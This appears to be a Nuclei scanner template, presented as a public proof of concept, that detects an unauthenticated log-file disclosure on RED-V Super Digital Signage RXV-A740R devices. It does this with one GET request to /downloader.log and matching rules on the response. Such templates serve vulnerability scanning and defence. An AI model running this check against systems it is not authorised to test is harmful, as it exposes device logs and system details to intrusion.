The application is vulnerable to sensitive information disclosure vulnerability. An unauthenticated attacker can visit several endpoints and disclose the webserver's log file list containing sensitive system resources and debug log information running on the device.
PoC代码[已公开]
id: redv-super-logs
info:
name: RED-V Super Digital Signage System RXV-A740R - Log Information Disclosure
author: r3Y3r53
severity: medium
description: |
The application is vulnerable to sensitive information disclosure vulnerability. An unauthenticated attacker can visit several endpoints and disclose the webserver's log file list containing sensitive system resources and debug log information running on the device.
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5609.php
metadata:
verified: true
max-request: 1
tags: redv,log,disclosure,exposure,vuln
http:
- method: GET
path:
- "{{BaseURL}}/downloader.log"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/plain")'
- 'contains_all(body, "Log file", "[LogParser]", "[INFO]")'
condition: and
# digest: 4a0a0047304502200af195d2ad9de95400b4ad305318387300e3b97ee5234cabdf4f11d32753cfb5022100f26e980b2788a00a4b262b8b349a40addeba17b5d93adb502d0b8fbd6030faa0:922c64590222798bb761d5b6d8e72950